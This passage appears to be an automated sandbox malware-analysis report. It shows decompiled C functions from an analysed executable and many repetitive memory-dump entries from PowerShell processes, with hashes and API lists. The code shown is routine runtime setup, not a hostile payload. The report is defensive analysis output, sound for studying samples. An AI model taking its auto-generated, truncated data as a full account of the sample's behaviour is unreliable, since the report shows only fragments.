                              • Opcode Fuzzy Hash: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                              • Instruction Fuzzy Hash: 18417C322046586EEB22DB14CC4DFFB7FA8DB06700F9400EAD549C7162CA794985CBAA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E00405F5E(intOrPtr __ecx, struct HINSTANCE__* __edx, void* __esi) {
                              				signed int _t38;
                              				WCHAR* _t54;
                              				WCHAR* _t58;
                              				int _t61;
                              				void* _t63;
                              				intOrPtr _t68;
                              
                              				E00413954(E00419764, _t63);
                              				_t68 =  *0x423148; // 0x1
                              				 *(_t63 - 0x14) = __edx;
                              				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
                              				 *((intOrPtr*)(_t63 - 0x18)) = 0;
                              				if(_t68 == 0) {
                              					_push( *(_t63 + 8));
                              					E00405EBC(_t63 - 0x30, __edx);
                              					 *((intOrPtr*)(_t63 - 4)) = 1;
                              					E00401A03();
                              					_push( *((intOrPtr*)(_t63 - 0x30)));
                              				} else {
                              					 *(_t63 - 0x24) = 0;
                              					 *(_t63 - 0x20) = 0;
                              					 *((intOrPtr*)(_t63 - 0x1c)) = 0;
                              					E00402170(_t63 - 0x24, 3);
                              					 *((intOrPtr*)(_t63 - 4)) = 0;
                              					_t61 = 0x100;
                              					do {
                              						_t61 = _t61 + 0x100;
                              						_t9 = _t61 - 1; // -1
                              						_t36 = _t9;
                              						if(_t9 >=  *((intOrPtr*)(_t63 - 0x1c))) {
                              							E00402170(_t63 - 0x24, _t36);
                              						}
                              						_t14 = _t63 - 0x14; // 0x414be4
                              					} while (_t61 - LoadStringW( *_t14,  *(_t63 + 8),  *(_t63 - 0x24), _t61) <= 1);
                              					_t54 =  *(_t63 - 0x24);
                              					_t38 = 0;
                              					if( *_t54 != 0) {
                              						_t58 = _t54;
                              						do {
                              							_t38 = _t38 + 1;
                              							_t58 =  &(_t58[1]);
                              						} while ( *_t58 != 0);
                              					}
                              					_t54[_t38] = 0;
                              					 *(_t63 - 0x20) = _t38;
                              					E00401CE1( *((intOrPtr*)(_t63 - 0x10)), _t63 - 0x24);
                              					_push( *(_t63 - 0x24));
                              				}
                              				E00403A9C();
                              				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
                              				return  *((intOrPtr*)(_t63 - 0x10));
                              			}










                              APIs
                              • __EH_prolog.LIBCMT ref: 00405F63
                              • LoadStringW.USER32(KA,?,?,00000000), ref: 00405FBC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prologLoadString
                              • String ID: KA
                              • API String ID: 385046869-4133974868
                              • Opcode ID: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                              • Instruction ID: f8b33de4bb70f64bdff40eb498b0250b344fd9cf2a6d880d3b442eae3703c9f6
                              • Opcode Fuzzy Hash: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                              • Instruction Fuzzy Hash: B8212771D0011A9BCB05EFA1C9919EEBBB5FF08308F10407AE106B6291DB794E40CB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E004172C2() {
                              				signed int _v8;
                              				char _v12;
                              				CHAR* _t14;
                              				intOrPtr _t27;
                              				CHAR* _t37;
                              				intOrPtr _t41;
                              				intOrPtr _t46;
                              
                              				_push(_t33);
                              				_t46 =  *0x425a08; // 0x1
                              				if(_t46 == 0) {
                              					E00418212();
                              				}
                              				GetModuleFileNameA(0, 0x423404, 0x104);
                              				_t14 =  *0x425a3c; // 0x663330
                              				 *0x4233f0 = 0x423404;
                              				_t37 = 0x423404;
                              				if( *_t14 != 0) {
                              					_t37 = _t14;
                              				}
                              				E0041735B(_t37, 0, 0,  &_v8,  &_v12);
                              				_t41 = E00413E65(_v12 + _v8 * 4);
                              				if(_t41 == 0) {
                              					E00414C0C(8);
                              				}
                              				E0041735B(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
                              				_t27 = _v8 - 1;
                              				 *0x4233d8 = _t41;
                              				 *0x4233d4 = _t27;
                              				return _t27;
                              			}











                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104,?,00000000,?,?,?,?,00414BA4), ref: 004172E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileModuleName
                              • String ID: 03f$C:\Users\user\Desktop\file.exe
                              • API String ID: 514040917-2073417093
                              • Opcode ID: da645aaeb4fe0cb827f73b94b10be33a860507997ce6edd88055b17a3d2933b4
                              • Instruction ID: 46598633bdd95e9c50c0f81cb0321b0ef1a06bc6faf2064ab6da3c70d88e46ff
                              • Opcode Fuzzy Hash: da645aaeb4fe0cb827f73b94b10be33a860507997ce6edd88055b17a3d2933b4
                              • Instruction Fuzzy Hash: 601142B6A00118BFD721DF98DC81CDBB7BCEB45758B5000ABF905D7201DA745F419BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405EBC(intOrPtr __ecx, struct HINSTANCE__* __edx) {
                              				intOrPtr _t29;
                              				CHAR* _t43;
                              				int _t49;
                              				void* _t51;
                              
                              				E00413954(E00419748, _t51);
                              				 *((intOrPtr*)(_t51 - 0x10)) = __ecx;
                              				 *(_t51 - 0x14) = __edx;
                              				 *((intOrPtr*)(_t51 - 0x18)) = 0;
                              				 *(_t51 - 0x24) = 0;
                              				 *((intOrPtr*)(_t51 - 0x20)) = 0;
                              				 *((intOrPtr*)(_t51 - 0x1c)) = 0;
                              				E0040243E(_t51 - 0x24, 3);
                              				 *((intOrPtr*)(_t51 - 4)) = 0;
                              				_t49 = 0x100;
                              				do {
                              					_t49 = _t49 + 0x100;
                              					_t9 = _t49 - 1; // -1
                              					_t27 = _t9;
                              					if(_t9 >=  *((intOrPtr*)(_t51 - 0x1c))) {
                              						E0040243E(_t51 - 0x24, _t27);
                              					}
                              					_t14 = _t51 - 0x14; // 0x414be4
                              				} while (_t49 - LoadStringA( *_t14,  *(_t51 + 8),  *(_t51 - 0x24), _t49) <= 1);
                              				_t43 =  *(_t51 - 0x24);
                              				_t29 = 0;
                              				if( *_t43 != 0) {
                              					do {
                              						_t29 = _t29 + 1;
                              					} while ( *((intOrPtr*)(_t29 + _t43)) != 0);
                              				}
                              				 *((char*)(_t29 + _t43)) = 0;
                              				 *((intOrPtr*)(_t51 - 0x20)) = _t29;
                              				E00403D24( *((intOrPtr*)(_t51 - 0x10)), _t51 - 0x24);
                              				E00403A9C( *(_t51 - 0x24));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
                              				return  *((intOrPtr*)(_t51 - 0x10));
                              			}








                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prologLoadString
                              • String ID: KA
                              • API String ID: 385046869-4133974868
                              • Opcode ID: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                              • Instruction ID: 682fdee239e6c4724d42c8af7adc4720fc3e2d38c4520a7b7ac2604701000241
                              • Opcode Fuzzy Hash: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                              • Instruction Fuzzy Hash: 6C1126B1D011199ACB06EFA5C9959EEBBB4FF18304F50447EE445B3291DB7A5E00CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004160FA() {
                              				signed int _t15;
                              				void* _t17;
                              				void* _t19;
                              				void* _t25;
                              				signed int _t26;
                              				void* _t27;
                              				intOrPtr* _t29;
                              
                              				_t15 =  *0x425a28; // 0x0
                              				_t26 =  *0x425a18; // 0x0
                              				if(_t15 != _t26) {
                              					L3:
                              					_t27 =  *0x425a2c; // 0x0
                              					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
                              					_t17 = HeapAlloc( *0x425a34, 8, 0x41c4);
                              					 *(_t29 + 0x10) = _t17;
                              					if(_t17 == 0) {
                              						L6:
                              						return 0;
                              					}
                              					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                              					 *(_t29 + 0xc) = _t19;
                              					if(_t19 != 0) {
                              						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
                              						 *_t29 = 0;
                              						 *((intOrPtr*)(_t29 + 4)) = 0;
                              						 *0x425a28 =  *0x425a28 + 1;
                              						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
                              						return _t29;
                              					}
                              					HeapFree( *0x425a34, 0,  *(_t29 + 0x10));
                              					goto L6;
                              				}
                              				_t2 = _t26 * 4; // 0x50
                              				_t25 = HeapReAlloc( *0x425a34, 0,  *0x425a2c, _t26 + _t2 + 0x50 << 2);
                              				if(_t25 == 0) {
                              					goto L6;
                              				}
                              				 *0x425a18 =  *0x425a18 + 0x10;
                              				 *0x425a2c = _t25;
                              				_t15 =  *0x425a28; // 0x0
                              				goto L3;
                              			}











                              APIs
                              • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416122
                              • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416156
                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00416170
                              • HeapFree.KERNEL32(00000000,?), ref: 00416187
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: AllocHeap$FreeVirtual
                              • String ID:
                              • API String ID: 3499195154-0
                              • Opcode ID: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                              • Instruction ID: c92a38fae87bb937ac208a7a453d8678043178d73965b4d0b203d58dccefea2c
                              • Opcode Fuzzy Hash: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                              • Instruction Fuzzy Hash: 98112B31300B01BFC7318F29EC869567BB5FB49764791862AF151C65B0C7709842CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004156E1(void* __eax) {
                              				void* _t1;
                              
                              				_t1 = __eax;
                              				InitializeCriticalSection( *0x42078c);
                              				InitializeCriticalSection( *0x42077c);
                              				InitializeCriticalSection( *0x42076c);
                              				InitializeCriticalSection( *0x42074c);
                              				return _t1;
                              			}





                              APIs
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156EE
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156F6
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156FE
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 00415706
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalInitializeSection
                              • String ID:
                              • API String ID: 32694325-0
                              • Opcode ID: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                              • Instruction ID: 9a5a21d657ffcc76f5c3c67f011d6e28d8344b300781f1748fbef07cd2b7b2eb
                              • Opcode Fuzzy Hash: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                              • Instruction Fuzzy Hash: CCC00231A05138ABCB712B65FC048563FB5EB882A03558077A1045203186612C12EFD8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.424006989.00007FF9A5640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5640000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_7ff9a5640000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 622978b3fcf4140a1fad4fc06b017763e5595810b7a758f3b7614c4cc03a2aa0
                              • Instruction ID: b137010881683bf4a604b86fded37691a18ac358a87a74cab0d15772dce3aa94
                              • Opcode Fuzzy Hash: 622978b3fcf4140a1fad4fc06b017763e5595810b7a758f3b7614c4cc03a2aa0
                              • Instruction Fuzzy Hash: 6C510831A4DA494FD304DB18D855BAAB7F1FF86310F0446BBE48DC7292CE78AD458781
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.424006989.00007FF9A5640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5640000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_7ff9a5640000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 755fe3cbdcad416eefa6f1acdf45f264f29895f7ace63e8cb25328fa015116ad
                              • Instruction ID: cb2986a5bb368abe1e14f5281d6ab5c9602a4fa24c80413e3d16075b3ffb8456
                              • Opcode Fuzzy Hash: 755fe3cbdcad416eefa6f1acdf45f264f29895f7ace63e8cb25328fa015116ad
                              • Instruction Fuzzy Hash: 7801677115CB0C4FDB44EF0CE451AA6B7E0FB99364F10056EE58AC3651DA36E881CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:49
                              Total number of Limit Nodes:3

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f12e45c25da915756fbe5e062fca3d0e457429be7f6825886378d58a30d24f65
                              • Instruction ID: 484e6cabafcb4f62bf4b9ce8cd04cc8af16c48d87b3ed2840acf3f7d83a8df07
                              • Opcode Fuzzy Hash: f12e45c25da915756fbe5e062fca3d0e457429be7f6825886378d58a30d24f65
                              • Instruction Fuzzy Hash: C5D1AD70B002089FDB04DB64D854BAEBBF7EF88700F198469E506AB3A1DF349D46CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440840573.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68e0000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 128deb45de4a2a89ed3be2a288f184daa6bc8f31a6c291c311a9d5d13c3d2b2a
                              • Instruction ID: 4407097fa55071ff29052f35435b0e9580cd1d99264ea5b893332c2e63e4612a
                              • Opcode Fuzzy Hash: 128deb45de4a2a89ed3be2a288f184daa6bc8f31a6c291c311a9d5d13c3d2b2a
                              • Instruction Fuzzy Hash: 5041B071A042599FDB04CFA9C844B9EFFF5FB48314F148169E608AB380C775A944CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,068EFCDF,00000000,00000000,00000003,00000000,00000002), ref: 068EFDEA
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440840573.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68e0000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e01b7110497a3587c768ce986073b58e2c48179ef8b6d134feba5bf940e63dfa
                              • Instruction ID: 75c5586c90b749e8609287e13949880254f322500aab40f75fd4547e68cbb6b0
                              • Opcode Fuzzy Hash: e01b7110497a3587c768ce986073b58e2c48179ef8b6d134feba5bf940e63dfa
                              • Instruction Fuzzy Hash: 40212876D002199FCB10CF99D844ADEFBB4FB09310F108119EA15A7710C775AA14CFE5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00E44FE0
                              Memory Dump Source
                              • Source File: 0000001F.00000002.430772758.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_e40000_powershell.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: a770915c42af9aab4f68f2a40aa9f354a4520f7fa7beaf3a51f7fe93d853e8c1
                              • Instruction ID: 0578164904000129c178b05952602e3991c0168bfb6257f4f228645c6947a00d
                              • Opcode Fuzzy Hash: a770915c42af9aab4f68f2a40aa9f354a4520f7fa7beaf3a51f7fe93d853e8c1
                              • Instruction Fuzzy Hash: 672115B1E006199BCB10CF9AD444BDEFBB4FB48714F11851AD419B7740C774A905CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00E44FE0
                              Memory Dump Source
                              • Source File: 0000001F.00000002.430772758.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_e40000_powershell.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 7872bac6a533761a7be19d7603e6e0e13b546bab5ec9cdc9d52748bfb2b79f7e
                              • Instruction ID: c90db5fce7be252759e4feba889f8ed2f895b56aed906f01ce7fa7a54554dcdd
                              • Opcode Fuzzy Hash: 7872bac6a533761a7be19d7603e6e0e13b546bab5ec9cdc9d52748bfb2b79f7e
                              • Instruction Fuzzy Hash: 942113B1E046599BCB10CF9AD444B9EFBF4BB48724F10812AE918B7740D774AA08CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
